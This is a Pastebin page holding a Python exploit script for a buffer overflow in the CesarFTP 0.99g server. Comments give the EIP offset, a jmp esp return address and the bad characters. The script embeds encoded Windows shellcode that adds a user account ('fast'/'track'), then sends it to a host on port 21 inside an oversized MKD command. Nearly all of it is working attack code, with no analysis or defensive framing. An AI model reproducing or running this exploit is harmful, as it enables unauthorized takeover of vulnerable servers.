Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- #----------------------------------------------------------------
- #EIP 674; (AAA=required for padding)
- #buffer = "\n"*671 + "AAA" + "BBBB" + "C"*300 === basic buffer (=978)
- #jmp esp 77D718FC - USER32.dll xp sp1
- #buffer = "\n"*671 + "pattern_create(307)" ==> EIP = 3; ESP = 7
- #free space for shellcode = 288
- #bad chars: \ x00 \ x20 \ x0a \ x0d
- #win32_adduser - PASS=track EXITFUNC=seh USER=fast Size=235 Encoder=ShikataGaNai
- #----------------------------------------------------------------
- shellcode=(
- "\x2b\xc9\xdb\xd3\xd9\x74\x24\xf4\xbb\x44\x73\xdf\xf9\xb1\x35\x5e"
- "\x83\xc6\x04\x31\x5e\x11\x03\x1a\x62\x3d\x0c\x5e\x6c\x85\xef\x9e"
- "\x6d\x8d\xb5\xa2\xe6\xed\x30\xa2\xf9\xe2\xb0\x1d\xe2\x77\x99\x81"
- "\x13\x63\x6f\x4a\x27\xf8\x71\xa2\x79\x3e\xe8\x96\xfe\x7e\x7f\xe1"
- "\x3f\xb4\x8d\xec\x7d\xa2\x7a\xd5\xd5\x11\x87\x5c\x33\xd2\xd8\xba"
- "\xba\x0e\x80\x49\xb0\x9b\xc6\x12\xd5\x1a\x32\x27\xf9\x97\xc5\xdc"
- "\x8b\xf4\xe1\x26\x4f\x35\x2a\x42\xc4\x76\x9a\x0f\x1a\x0e\xd6\x84"
- "\xdb\xe3\x6d\xea\xc7\x56\xfa\x62\xf0\x43\xf4\xf9\x80\x24\x07\xfd"
- "\x80\xcf\x60\xc1\xdf\xfe\x86\x59\xb6\x89\x9f\x1a\xf6\xf1\x0f\x74"
- "\x07\x8f\xb4\xdb\x8f\x08\x4a\x69\x41\x7e\x4c\x8a\x3d\xed\xd6\x7a"
- "\xa7\x95\x73\xa2\x08\x05\x5c\xcc\x33\xbd\xbc\x65\xcf\x58\xcf\xa5"
- "\x49\xc2\x5c\xd1\xb5\x70\xd1\x78\xd5\x13\x35\x55\x58\xa0\x71\x89"
- "\x7c\x0e\x5a\xa7\xe5\x3a\xba\x5b\x89\xa1\xdb\xcf\x32\x54\x73\x7a"
- "\xcd\xb8\xca\xe0\x40\xd0\xa2\x81\xe9\x56\x49\x30\x7a\xf8\xdf\xc1"
- "\xa2\x60\x41\x56\xd7\x4c\xae\xd9\x53\xc9\xb0")
- #keeping original buffer length of 978
- buffer = "\n"*671 + "AAA" + "\xFC\x18\xD7\x77" + "\x90"*16 + shellcode + "\xcc"*49
- print "\nConnecting to CesarFTP 0.99g"
- print "\nCreating User Account (u:fast/pw:track)"
- print "\nAll your services @re belong to us..."
- s.connect(('192.168.1.70' ,21))
- data = s.recv(1024)
- s.send('USER ftp' +'\r\n')
- data = s.recv(1024)
- s.send('PASS ftp' +'\r\n')
- data = s.recv(1024)
- s.send('MKD ' + buffer + '\r\n')
- s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement